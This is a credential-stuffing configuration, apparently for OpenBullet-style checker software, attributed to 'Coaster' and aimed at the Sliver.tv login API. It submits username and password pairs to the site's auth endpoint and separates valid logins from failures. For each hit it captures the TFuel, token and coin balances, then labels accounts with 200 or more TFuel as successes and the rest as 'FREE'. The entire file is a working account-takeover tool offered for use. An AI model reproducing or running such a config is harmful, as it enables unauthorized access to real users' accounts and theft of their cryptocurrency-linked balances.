[SETTINGS]
{
  "Name": "[Updated] Sliver.tv",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-07-07T02:11:33.5975325+01:00",
  "AdditionalInfo": "",
  "Author": "Coaster",
  "Version": "1.3.1 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://api.sliver.tv/v1/user/auth" 
  CONTENT "{\"email_or_username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "X-App-Version: 4" 
  HEADER "X-Platform: web" 
  HEADER "Origin: https://www.sliver.tv" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"status\":\"SUCCESS\"" 
  KEYCHAIN Failure OR 
    KEY "Invalid login credentials" 

PARSE "<SOURCE>" LR "tfuel\":\"" "\",\"" -> CAP "TFuel" 

PARSE "<SOURCE>" LR "tfuel\":\"" "\",\"" -> VAR "T" 

PARSE "<SOURCE>" LR "milli_thetas\":" ",\"" -> CAP "Tokens" 

PARSE "<SOURCE>" LR "coins\":" "}}" -> CAP "Coins" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<T>" GreaterThan "199" 
  KEYCHAIN Custom "FREE" OR 
    KEY "<T>" LessThan "200" 

